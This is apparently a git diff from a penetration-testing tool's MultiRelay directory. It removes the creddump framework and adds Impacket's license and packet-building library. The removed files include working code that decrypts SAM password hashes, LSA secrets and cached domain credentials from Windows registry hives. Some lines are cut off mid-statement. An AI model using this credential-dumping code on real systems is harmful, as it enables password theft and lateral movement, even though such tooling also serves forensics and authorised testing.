try: - return super(Pointer,self).__getattribute__(attr) - except AttributeError: - return getattr(self.value, attr) - - def __repr__(self): - return "" % (self.value.name, self.value.address) - - def members(self): - return self.value.members() - -class _UNICODE_STRING(Obj): - """Class representing a _UNICODE_STRING - - Adds the following behavior: - * The Buffer attribute is presented as a Python string rather - than a pointer to an unsigned short. - * The __str__ method returns the value of the Buffer. - """ - - def __new__(typ, *args, **kwargs): - obj = object.__new__(typ) - return obj - - def __str__(self): - return self.Buffer - - # Custom Attributes - def getBuffer(self): - return read_unicode_string(self.space, types, [], self.address) - Buffer = property(fget=getBuffer) - -class _CM_KEY_NODE(Obj): - def __new__(typ, *args, **kwargs): - obj = object.__new__(typ) - return obj - - def getName(self): - return read_string(self.space, types, ['_CM_KEY_NODE', 'Name'], - self.address, self.NameLength.value) - Name = property(fget=getName) - -class _CM_KEY_VALUE(Obj): - def __new__(typ, *args, **kwargs): - obj = object.__new__(typ) - return obj - - def getName(self): - return read_string(self.space, types, ['_CM_KEY_VALUE', 'Name'], - self.address, self.NameLength.value) - Name = property(fget=getName) - -class _CHILD_LIST(Obj): - def __new__(typ, *args, **kwargs): - obj = object.__new__(typ) - return obj - - def getList(self): - lst = [] - list_address = read_obj(self.space, types, - ['_CHILD_LIST', 'List'], self.address) - for i in range(self.Count.value): - lst.append(Pointer("pointer", list_address+(i*4), self.space, - ["_CM_KEY_VALUE"])) - return lst - List = property(fget=getList) - -class _CM_KEY_INDEX(Obj): - def __new__(typ, *args, **kwargs): - obj = object.__new__(typ) - return obj - - def getList(self): - lst = [] - for i in range(self.Count.value): - # we are ignoring the hash value here - off,tp = get_obj_offset(types, ['_CM_KEY_INDEX', 'List', i*2]) - lst.append(Pointer("pointer", self.address+off, self.space, - ["_CM_KEY_NODE"])) - return lst - List = property(fget=getList) diff --git a/tools/MultiRelay/creddump/framework/object.py b/tools/MultiRelay/creddump/framework/object.py deleted file mode 100644 index 8dfff64..0000000 --- a/tools/MultiRelay/creddump/framework/object.py +++ /dev/null @@ -1,171 +0,0 @@ -# Volatools Basic -# Copyright (C) 2007 Komoku, Inc. -# -# This program is free software; you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation; either version 2 of the License, or (at -# your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -# - -""" -@author: AAron Walters and Nick Petroni -@license: GNU General Public License 2.0 or later -@contact: awalters@komoku.com, npetroni@komoku.com -@organization: Komoku, Inc. -""" - -import struct - -builtin_types = { \ - 'int' : (4, 'i'), \ - 'long': (4, 'i'), \ - 'unsigned long' : (4, 'I'), \ - 'unsigned int' : (4, 'I'), \ - 'address' : (4, 'I'), \ - 'char' : (1, 'c'), \ - 'unsigned char' : (1, 'B'), \ - 'unsigned short' : (2, 'H'), \ - 'short' : (2, 'h'), \ - 'long long' : (8, 'q'), \ - 'unsigned long long' : (8, 'Q'), \ - 'pointer' : (4, 'I'),\ - } - - -def obj_size(types, objname): - if not types.has_key(objname): - raise Exception('Invalid type %s not in types' % (objname)) - - return types[objname][0] - -def builtin_size(builtin): - if not builtin_types.has_key(builtin): - raise Exception('Invalid built-in type %s' % (builtin)) - - return builtin_types[builtin][0] - -def read_value(addr_space, value_type, vaddr): - """ - Read the low-level value for a built-in type. - """ - - if not builtin_types.has_key(value_type): - raise Exception('Invalid built-in type %s' % (value_type)) - - type_unpack_char = builtin_types[value_type][1] - type_size = builtin_types[value_type][0] - - buf = addr_space.read(vaddr, type_size) - if buf is None: - return None - (val, ) = struct.unpack(type_unpack_char, buf) - - return val - -def read_unicode_string(addr_space, types, member_list, vaddr): - offset = 0 - if len(member_list) > 1: - (offset, current_type) = get_obj_offset(types, member_list) - - - buf = read_obj(addr_space, types, ['_UNICODE_STRING', 'Buffer'], vaddr + offset) - length = read_obj(addr_space, types, ['_UNICODE_STRING', 'Length'], vaddr + offset) - - if length == 0x0: - return "" - - if buf is None or length is None: - return None - - readBuf = read_string(addr_space, types, ['char'], buf, length) - - if readBuf is None: - return None - - try: - readBuf = readBuf.decode('UTF-16').encode('ascii') - except: - return None - - return readBuf - -def read_string(addr_space, types, member_list, vaddr, max_length=256): - offset = 0 - if len(member_list) > 1: - (offset, current_type) = get_obj_offset(types, member_list) - - val = addr_space.read(vaddr + offset, max_length) - - return val - - -def read_null_string(addr_space, types, member_list, vaddr, max_length=256): - string = read_string(addr_space, types, member_list, vaddr, max_length) - - if string is None: - return None - - if (string.find('\0') == -1): - return string - (string, none) = string.split('\0', 1) - return string - - -def get_obj_offset(types, member_list): - """ - Returns the (offset, type) pair for a given list - """ - member_list.reverse() - - current_type = member_list.pop() - - offset = 0 - - while (len(member_list) > 0): - if current_type == 'array': - current_type = member_dict[current_member][1][2][0] - if current_type in builtin_types: - current_type_size = builtin_size(current_type) - else: - current_type_size = obj_size(types, current_type) - index = member_list.pop() - offset += index * current_type_size - continue - - elif not types.has_key(current_type): - raise Exception('Invalid type ' + current_type) - - member_dict = types[current_type][1] - - current_member = member_list.pop() - if not member_dict.has_key(current_member): - raise Exception('Invalid member %s in type %s' % (current_member, current_type)) - - offset += member_dict[current_member][0] - - current_type = member_dict[current_member][1][0] - - return (offset, current_type) - - -def read_obj(addr_space, types, member_list, vaddr): - """ - Read the low-level value for some complex type's member. - The type must have members. - """ - if len(member_list) < 2: - raise Exception('Invalid type/member ' + str(member_list)) - - - - (offset, current_type) = get_obj_offset(types, member_list) - return read_value(addr_space, current_type, vaddr + offset) diff --git a/tools/MultiRelay/creddump/framework/types.py b/tools/MultiRelay/creddump/framework/types.py deleted file mode 100644 index 873e555..0000000 --- a/tools/MultiRelay/creddump/framework/types.py +++ /dev/null @@ -1,63 +0,0 @@ -# This file is part of creddump. -# -# creddump is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# creddump is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with creddump. If not, see . - -""" -@author: Brendan Dolan-Gavitt -@license: GNU General Public License 2.0 or later -@contact: bdolangavitt@wesleyan.edu -""" - -regtypes = { - '_CM_KEY_VALUE' : [ 0x18, { - 'Signature' : [ 0x0, ['unsigned short']], - 'NameLength' : [ 0x2, ['unsigned short']], - 'DataLength' : [ 0x4, ['unsigned long']], - 'Data' : [ 0x8, ['unsigned long']], - 'Type' : [ 0xc, ['unsigned long']], - 'Flags' : [ 0x10, ['unsigned short']], - 'Spare' : [ 0x12, ['unsigned short']], - 'Name' : [ 0x14, ['array', 1, ['unsigned short']]], -} ], - '_CM_KEY_NODE' : [ 0x50, { - 'Signature' : [ 0x0, ['unsigned short']], - 'Flags' : [ 0x2, ['unsigned short']], - 'LastWriteTime' : [ 0x4, ['_LARGE_INTEGER']], - 'Spare' : [ 0xc, ['unsigned long']], - 'Parent' : [ 0x10, ['unsigned long']], - 'SubKeyCounts' : [ 0x14, ['array', 2, ['unsigned long']]], - 'SubKeyLists' : [ 0x1c, ['array', 2, ['unsigned long']]], - 'ValueList' : [ 0x24, ['_CHILD_LIST']], - 'ChildHiveReference' : [ 0x1c, ['_CM_KEY_REFERENCE']], - 'Security' : [ 0x2c, ['unsigned long']], - 'Class' : [ 0x30, ['unsigned long']], - 'MaxNameLen' : [ 0x34, ['unsigned long']], - 'MaxClassLen' : [ 0x38, ['unsigned long']], - 'MaxValueNameLen' : [ 0x3c, ['unsigned long']], - 'MaxValueDataLen' : [ 0x40, ['unsigned long']], - 'WorkVar' : [ 0x44, ['unsigned long']], - 'NameLength' : [ 0x48, ['unsigned short']], - 'ClassLength' : [ 0x4a, ['unsigned short']], - 'Name' : [ 0x4c, ['array', 1, ['unsigned short']]], -} ], - '_CM_KEY_INDEX' : [ 0x8, { - 'Signature' : [ 0x0, ['unsigned short']], - 'Count' : [ 0x2, ['unsigned short']], - 'List' : [ 0x4, ['array', 1, ['unsigned long']]], -} ], - '_CHILD_LIST' : [ 0x8, { - 'Count' : [ 0x0, ['unsigned long']], - 'List' : [ 0x4, ['unsigned long']], -} ], -} diff --git a/tools/MultiRelay/creddump/framework/win32/__init__.py b/tools/MultiRelay/creddump/framework/win32/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/tools/MultiRelay/creddump/framework/win32/domcachedump.py b/tools/MultiRelay/creddump/framework/win32/domcachedump.py deleted file mode 100644 index 37d0314..0000000 --- a/tools/MultiRelay/creddump/framework/win32/domcachedump.py +++ /dev/null @@ -1,117 +0,0 @@ -# This file is part of creddump. -# -# creddump is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# creddump is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with creddump. If not, see . - -""" -@author: Brendan Dolan-Gavitt -@license: GNU General Public License 2.0 or later -@contact: bdolangavitt@wesleyan.edu -""" - -from framework.win32.rawreg import * -from framework.addrspace import HiveFileAddressSpace -#from framework.win32.hashdump import get_bootkey -from framework.win32.lsasecrets import get_secret_by_name,get_lsa_key -from Crypto.Hash import HMAC -from Crypto.Cipher import ARC4 -from struct import unpack - -def get_nlkm(secaddr, lsakey): - return get_secret_by_name(secaddr, 'NL$KM', lsakey) - -def decrypt_hash(edata, nlkm, ch): - hmac_md5 = HMAC.new(nlkm,ch) - rc4key = hmac_md5.digest() - - rc4 = ARC4.new(rc4key) - data = rc4.encrypt(edata) - return data - -def parse_cache_entry(cache_data): - (uname_len, domain_len) = unpack(". - -""" -@author: Brendan Dolan-Gavitt -@license: GNU General Public License 2.0 or later -@contact: bdolangavitt@wesleyan.edu -""" - -from framework.win32.rawreg import * -from framework.addrspace import HiveFileAddressSpace -try: - from Crypto.Hash import MD5 - from Crypto.Cipher import ARC4,DES -except ImportError: - pass -from struct import unpack,pack - -odd_parity = [ - 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14, - 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31, - 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47, - 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62, - 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79, - 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94, - 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110, - 112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127, - 128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143, - 145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158, - 161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174, - 176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191, - 193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206, - 208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223, - 224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239, - 241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254 -] - -# Permutation matrix for boot key -p = [ 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, - 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 ] - -# Constants for SAM decrypt algorithm -aqwerty = "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0" -anum = "0123456789012345678901234567890123456789\0" -antpassword = "NTPASSWORD\0" -almpassword = "LMPASSWORD\0" - -empty_lm = "aad3b435b51404eeaad3b435b51404ee".decode('hex') -empty_nt = "31d6cfe0d16ae931b73c59d7e0c089c0".decode('hex') - -def str_to_key(s): - key = [] - key.append( ord(s[0])>>1 ) - key.append( ((ord(s[0])&0x01)<<6) | (ord(s[1])>>2) ) - key.append( ((ord(s[1])&0x03)<<5) | (ord(s[2])>>3) ) - key.append( ((ord(s[2])&0x07)<<4) | (ord(s[3])>>4) ) - key.append( ((ord(s[3])&0x0F)<<3) | (ord(s[4])>>5) ) - key.append( ((ord(s[4])&0x1F)<<2) | (ord(s[5])>>6) ) - key.append( ((ord(s[5])&0x3F)<<1) | (ord(s[6])>>7) ) - key.append( ord(s[6])&0x7F ) - for i in range(8): - key[i] = (key[i]<<1) - key[i] = odd_parity[key[i]] - return "".join(chr(k) for k in key) - -def sid_to_key(sid): - s1 = "" - s1 += chr(sid & 0xFF) - s1 += chr((sid>>8) & 0xFF) - s1 += chr((sid>>16) & 0xFF) - s1 += chr((sid>>24) & 0xFF) - s1 += s1[0]; - s1 += s1[1]; - s1 += s1[2]; - s2 = s1[3] + s1[0] + s1[1] + s1[2] - s2 += s2[0] + s2[1] + s2[2] - - return str_to_key(s1),str_to_key(s2) - -def find_control_set(sysaddr): - root = get_root(sysaddr) - if not root: - return 1 - - csselect = open_key(root, ["Select"]) - if not csselect: - return 1 - - for v in values(csselect): - if v.Name == "Current": return v.Data.value - -def get_hbootkey(samaddr, bootkey): - sam_account_path = ["SAM", "Domains", "Account"] - - root = get_root(samaddr) - if not root: return None - - sam_account_key = open_key(root, sam_account_path) - if not sam_account_key: return None - - F = None - for v in values(sam_account_key): - if v.Name == 'F': - F = samaddr.read(v.Data.value, v.DataLength.value) - if not F: return None - - md5 = MD5.new() - md5.update(F[0x70:0x80] + aqwerty + bootkey + anum) - rc4_key = md5.digest() - - rc4 = ARC4.new(rc4_key) - hbootkey = rc4.encrypt(F[0x80:0xA0]) - - return hbootkey - -def get_user_keys(samaddr): - user_key_path = ["SAM", "Domains", "Account", "Users"] - - root = get_root(samaddr) - if not root: return [] - - user_key = open_key(root, user_key_path) - if not user_key: return [] - - return [k for k in subkeys(user_key) if k.Name != "Names"] - -def decrypt_single_hash(rid, hbootkey, enc_hash, lmntstr): - (des_k1,des_k2) = sid_to_key(rid) - d1 = DES.new(des_k1, DES.MODE_ECB) - d2 = DES.new(des_k2, DES.MODE_ECB) - - md5 = MD5.new() - md5.update(hbootkey[:0x10] + pack(". - -""" -@author: Brendan Dolan-Gavitt -@license: GNU General Public License 2.0 or later -@contact: bdolangavitt@wesleyan.edu -""" - -from framework.win32.rawreg import * -from framework.addrspace import HiveFileAddressSpace -#from framework.win32.hashdump import get_bootkey,str_to_key -from Crypto.Hash import MD5 -from Crypto.Cipher import ARC4,DES - -def get_lsa_key(secaddr, bootkey): - root = get_root(secaddr) - if not root: - return None - - enc_reg_key = open_key(root, ["Policy", "PolSecretEncryptionKey"]) - if not enc_reg_key: - exit(1) - return None - - enc_reg_value = enc_reg_key.ValueList.List[0] - if not enc_reg_value: - return None - - obf_lsa_key = secaddr.read(enc_reg_value.Data.value, - enc_reg_value.DataLength.value) - if not obf_lsa_key: - return None - - md5 = MD5.new() - md5.update(bootkey) - for i in range(1000): - md5.update(obf_lsa_key[60:76]) - rc4key = md5.digest() - - rc4 = ARC4.new(rc4key) - lsa_key = rc4.decrypt(obf_lsa_key[12:60]) - - return lsa_key[0x10:0x20] - -def decrypt_secret(secret, key): - """Python implementation of SystemFunction005. - - Decrypts a block of data with DES using given key. - Note that key can be longer than 7 bytes.""" - decrypted_data = '' - j = 0 # key index - for i in range(0,len(secret),8): - enc_block = secret[i:i+8] - block_key = key[j:j+7] - des_key = str_to_key(block_key) - - des = DES.new(des_key, DES.MODE_ECB) - decrypted_data += des.decrypt(enc_block) - - j += 7 - if len(key[j:j+7]) < 7: - j = len(key[j:j+7]) - - (dec_data_len,) = unpack(". - -""" -@author: Brendan Dolan-Gavitt -@license: GNU General Public License 2.0 or later -@contact: bdolangavitt@wesleyan.edu -""" - -from framework.newobj import Obj,Pointer -from struct import unpack - -ROOT_INDEX = 0x20 -LH_SIG = unpack(". - -""" -@author: Brendan Dolan-Gavitt -@license: GNU General Public License 2.0 or later -@contact: bdolangavitt@wesleyan.edu -""" - -import sys -from framework.win32.lsasecrets import get_file_secrets - -# Hex dump code from -# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812 - -FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)]) - -def dump(src, length=8): - N=0; result='' - while src: - s,src = src[:length],src[length:] - hexa = ' '.join(["%02X"%ord(x) for x in s]) - s = s.translate(FILTER) - result += "%04X %-*s %s\n" % (N, length*3, hexa, s) - N+=length - return result - -if len(sys.argv) < 3: - print "usage: %s Bootkey " % sys.argv[0] - sys.exit(1) - -secrets = get_file_secrets(sys.argv[1].decode("hex"), sys.argv[2]) -if not secrets: - print "Unable to read LSA secrets. Perhaps you provided invalid hive files?" - sys.exit(1) - -for k in secrets: - print k - print dump(secrets[k], length=16) - diff --git a/tools/MultiRelay/creddump/pwdump.py b/tools/MultiRelay/creddump/pwdump.py deleted file mode 100755 index a753907..0000000 --- a/tools/MultiRelay/creddump/pwdump.py +++ /dev/null @@ -1,31 +0,0 @@ -#!/usr/bin/env python - -# This file is part of creddump. -# -# creddump is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# creddump is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with creddump. If not, see . - -""" -@author: Brendan Dolan-Gavitt -@license: GNU General Public License 2.0 or later -@contact: bdolangavitt@wesleyan.edu -""" - -import sys -from framework.win32.hashdump import dump_file_hashes - -if len(sys.argv) < 3: - print "usage: %s bootkey SAM_File" % sys.argv[0] - sys.exit(1) - -dump_file_hashes(sys.argv[1].decode("hex"), sys.argv[2]) diff --git a/tools/MultiRelay/impacket-dev/LICENSE b/tools/MultiRelay/impacket-dev/LICENSE new file mode 100644 index 0000000..159cdd1 --- /dev/null +++ b/tools/MultiRelay/impacket-dev/LICENSE @@ -0,0 +1,84 @@ +Licencing +--------- + +We provide this software under a slightly modified version of the +Apache Software License. The only changes to the document were the +replacement of "Apache" with "Impacket" and "Apache Software Foundation" +with "SecureAuth Corporation". Feel free to compare the resulting +document to the official Apache license. + +The `Apache Software License' is an Open Source Initiative Approved +License. + + +The Apache Software License, Version 1.1 +Modifications by SecureAuth Corporation (see above) + +Copyright (c) 2000 The Apache Software Foundation. All rights +reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions +are met: + +1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in + the documentation and/or other materials provided with the + distribution. + +3. The end-user documentation included with the redistribution, + if any, must include the following acknowledgment: + "This product includes software developed by + SecureAuth Corporation (https://www.secureauth.com/)." + Alternately, this acknowledgment may appear in the software itself, + if and wherever such third-party acknowledgments normally appear. + +4. The names "Impacket", "SecureAuth Corporation" must + not be used to endorse or promote products derived from this + software without prior written permission. For written + permission, please contact oss@secureauth.com. + +5. Products derived from this software may not be called "Impacket", + nor may "Impacket" appear in their name, without prior written + permission of SecureAuth Corporation. + +THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED +WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES +OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR +ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF +USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT +OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF +SUCH DAMAGE. + + + +Smb.py and nmb.py are based on Pysmb by Michael Teo +(https://miketeo.net/projects/pysmb/), and are distributed under the +following license: + +This software is provided 'as-is', without any express or implied +warranty. In no event will the author be held liable for any damages +arising from the use of this software. + +Permission is granted to anyone to use this software for any purpose, +including commercial applications, and to alter it and redistribute it +freely, subject to the following restrictions: + +1. The origin of this software must not be misrepresented; you must + not claim that you wrote the original software. If you use this + software in a product, an acknowledgment in the product + documentation would be appreciated but is not required. + +2. Altered source versions must be plainly marked as such, and must + not be misrepresented as being the original software. + +3. This notice cannot be removed or altered from any source + distribution. diff --git a/tools/MultiRelay/impacket-dev/impacket/ImpactPacket.py b/tools/MultiRelay/impacket-dev/impacket/ImpactPacket.py new file mode 100644 index 0000000..5e84c42 --- /dev/null +++ b/tools/MultiRelay/impacket-dev/impacket/ImpactPacket.py @@ -0,0 +1,2130 @@ +# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. +# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# Description: +# Network packet codecs basic building blocks. +# Low-level packet codecs for various Internet protocols. +# +# Author: +# Javier Burroni (javier) +# Bruce Leidl (brl) +# Javier Kohen (jkohen) +from __future__ import division +from __future__ import print_function +import array +import struct +import socket +import string +import sys +from binascii import hexlify +from functools import reduce + +"""Classes to build network packets programmatically. + +Each protocol layer is represented by an object, and these objects are +hierarchically structured to form a packet. This list is traversable +in both directions: from parent to child and vice versa. + +All objects can be turned back into a raw buffer ready to be sent over +the wire (see method get_packet). +""" + +class ImpactPacketException(Exception): + def __init__(self, value): + self.value = value + def __str__(self): + return repr(self.value) + +class PacketBuffer(object): + """Implement the basic operations utilized to operate on a + packet's raw buffer. All the packet classes derive from this one. + + The byte, word, long and ip_address getters and setters accept + negative indexes, having these the a similar effect as in a + regular Python sequence slice. + """ + + def __init__(self, length = None): + "If 'length' is specified the buffer is created with an initial size" + if length: + self.__bytes = array.array('B', b'\0' * length) + else: + self.__bytes = array.array('B') + + def set_bytes_from_string(self, data): + "Sets the value of the packet buffer from the string 'data'" + self.__bytes = array.array('B', data) + + def get_buffer_as_string(self): + "Returns the packet buffer as a string object" + return self.__bytes.tostring() + + def get_bytes(self): + "Returns the packet buffer as an array" + return self.__bytes + + def set_bytes(self, bytes): + "Set the packet buffer from an array" + # Make a copy to be safe + self.__bytes = array.array('B', bytes.tolist()) + + def set_byte(self, index, value): + "Set byte at 'index' to 'value'" + index = self.__validate_index(index, 1) + self.__bytes[index] = value + + def get_byte(self, index): + "Return byte at 'index'" + index = self.__validate_index(index, 1) + return self.__bytes[index] + + def set_word(self, index, value, order = '!'): + "Set 2-byte word at 'index' to 'value'. See struct module's documentation to understand the meaning of 'order'." + index = self.__validate_index(index, 2) + ary = array.array("B", struct.pack(order + 'H', value)) + if -2 == index: + self.__bytes[index:] = ary + else: + self.__bytes[index:index+2] = ary + + def get_word(self, index, order = '!'): + "Return 2-byte word at 'index'. See struct module's documentation to understand the meaning of 'order'." + index = self.__validate_index(index, 2) + if -2 == index: + bytes = self.__bytes[index:] + else: + bytes = self.__bytes[index:index+2] + (value,) = struct.unpack(order + 'H', bytes.tostring()) + return value + + def set_long(self, index, value, order = '!'): + "Set 4-byte 'value' at 'index'. See struct module's documentation to understand the meaning of 'order'." + index = self.__validate_index(index, 4) + ary = array.array("B", struct.pack(order + 'L', value)) + if -4 == index: + self.__bytes[index:] = ary + else: + self.__bytes[index:index+4] = ary + + def get_long(self, index, order = '!'): + "Return 4-byte value at 'index'. See struct module's documentation to understand the meaning of 'order'." + index = self.__validate_index(index, 4) + if -4 == index: + bytes = self.__bytes[index:] + else: + bytes = self.__bytes[index:index+4] + (value,) = struct.unpack(order + 'L', bytes.tostring()) + return value + + def set_long_long(self, index, value, order = '!'): + "Set 8-byte 'value' at 'index'. See struct module's documentation to understand the meaning of 'order'." + index = self.__validate_index(index, 8) + ary = array.array("B", struct.pack(order + 'Q', value)) + if -8 == index: + self.__bytes[index:] = ary + else: + self.__bytes[index:index+8] = ary + + def get_long_long(self, index, order = '!'): + "Return 8-byte value at 'index'. See struct module's documentation to understand the meaning of 'order'." + index = self.__validate_index(index, 8) + if -8 == index: + bytes = self.__bytes[index:] + else: + bytes = self.__bytes[index:index+8] + (value,) = struct.unpack(order + 'Q', bytes.tostring()) + return value + + + def get_ip_address(self, index): + "Return 4-byte value at 'index' as an IP string" + index = self.__validate_index(index, 4) + if -4 == index: + bytes = self.__bytes[index:] + else: + bytes = self.__bytes[index:index+4] + return socket.inet_ntoa(bytes.tostring()) + + def set_ip_address(self, index, ip_string): + "Set 4-byte value at 'index' from 'ip_string'" + index = self.__validate_index(index, 4) + raw = socket.inet_aton(ip_string) + (b1,b2,b3,b4) = struct.unpack("BBBB", raw) + self.set_byte(index, b1) + self.set_byte(index + 1, b2) + self.set_byte(index + 2, b3) + self.set_byte(index + 3, b4) + + def set_checksum_from_data(self, index, data): + "Set 16-bit checksum at 'index' by calculating checksum of 'data'" + self.set_word(index, self.compute_checksum(data)) + + def compute_checksum(self, anArray): + "Return the one's complement of the one's complement sum of all the 16-bit words in 'anArray'" + nleft = len(anArray) + sum = 0 + pos = 0 + while nleft > 1: + sum = anArray[pos] * 256 + (anArray[pos + 1] + sum) + pos = pos + 2 + nleft = nleft - 2 + if nleft == 1: + sum = sum + anArray[pos] * 256 + return self.normalize_checksum(sum) + + def normalize_checksum(self, aValue): + sum = aValue + sum = (sum >> 16) + (sum & 0xFFFF) + sum += (sum >> 16) + sum = (~sum & 0xFFFF) + return sum + + def __validate_index(self, index, size): + """This method performs two tasks: to allocate enough space to + fit the elements at positions index through index+size, and to + adjust negative indexes to their absolute equivalent. + """ + + orig_index = index + + curlen = len(self.__bytes) + if index < 0: + index = curlen + index + + diff = index + size - curlen + if diff > 0: + self.__bytes.fromstring('\0' * diff) + if orig_index < 0: + orig_index -= diff + + return orig_index + +class ProtocolLayer(): + "Protocol Layer Manager for insertion and removal of protocol layers." + + __child = None + __parent = None + + def contains(self, aHeader): + "Set 'aHeader' as the child of this protocol layer" + self.__child = aHeader + aHeader.set_parent(self) + + def set_parent(self, my_parent): + "Set the header 'my_parent' as the parent of this protocol layer" + self.__parent = my_parent + + def child(self): + "Return the child of this protocol layer" + return self.__child + + def parent(self): + "Return the parent of this protocol layer" + return self.__parent + + def unlink_child(self): + "Break the hierarchy parent/child child/parent" + if self.__child: + self.__child.set_parent(None) + self.__child = None + +class ProtocolPacket(ProtocolLayer): + __HEADER_SIZE = 0 + __BODY_SIZE = 0 + __TAIL_SIZE = 0 + + __header = None + __body = None + __tail = None + + def __init__(self, header_size, tail_size): + self.__HEADER_SIZE = header_size + self.__TAIL_SIZE = tail_size + self.__header=PacketBuffer(self.__HEADER_SIZE) + self.__body=PacketBuffer() + self.__tail=PacketBuffer(self.__TAIL_SIZE) + + def __update_body_from_child(self): + # Update child raw packet in my body + if self.child(): + body=self.child().get_packet() + self.__BODY_SIZE=len(body) + self.__body.set_bytes_from_string(body) + + def __get_header(self): + return self.__header + + header = property(__get_header) + + def __get_body(self): + self.__update_body_from_child() + return self.__body + + body = property(__get_body) + + def __get_tail(self): + return self.__tail + + tail = property(__get_tail) + + def get_header_size(self): + "Return frame header size" + return self.__HEADER_SIZE + + def get_tail_size(self): + "Return frame tail size" + return self.__TAIL_SIZE + + def get_body_size(self): + "Return frame body size" + self.__update_body_from_child() + return self.__BODY_SIZE + + def get_size(self): + "Return frame total size" + return self.get_header_size()+self.get_body_size()+self.get_tail_size() + + def load_header(self, aBuffer): + self.__HEADER_SIZE=len(aBuffer) + self.__header.set_bytes_from_string(aBuffer) + + def load_body(self, aBuffer): + "Load the packet body from string. "\ + "WARNING: Using this function will break the hierarchy of preceding protocol layer" + self.unlink_child() + self.__BODY_SIZE=len(aBuffer) + self.__body.set_bytes_from_string(aBuffer) + + def load_tail(self, aBuffer): + self.__TAIL_SIZE=len(aBuffer) + self.__tail.set_bytes_from_string(aBuffer) + + def __extract_header(self, aBuffer): + self.load_header(aBuffer[:self.__HEADER_SIZE]) + + def __extract_body(self, aBuffer): + if self.__TAIL_SIZE<=0: + end=None + else: + end=-self.__TAIL_SIZE + self.__BODY_SIZE=len(aBuffer[self.__HEADER_SIZE:end]) + self.__body.set_bytes_from_string(aBuffer[self.__HEADER_SIZE:end]) + + def __extract_tail(self, aBuffer): + if self.__TAIL_SIZE<=0: + # leave the array empty + return + else: + start=-self.__TAIL_SIZE + self.__tail.set_bytes_from_string(aBuffer[start:]) + + def load_packet(self, aBuffer): + "Load the whole packet from a string" \ + "WARNING: Using this function will break the hierarchy of preceding protocol layer" + self.unlink_child() + + self.__extract_header(aBuffer) + self.__extract_body(aBuffer) + self.__extract_tail(aBuffer) + + def get_header_as_string(self): + return self.__header.get_buffer_as_string() + + def get_body_as_string(self): + self.__update_body_from_child() + return self.__body.get_buffer_as_string() + body_string = property(get_body_as_string) + + def get_tail_as_string(self): + return self.__tail.get_buffer_as_string() + 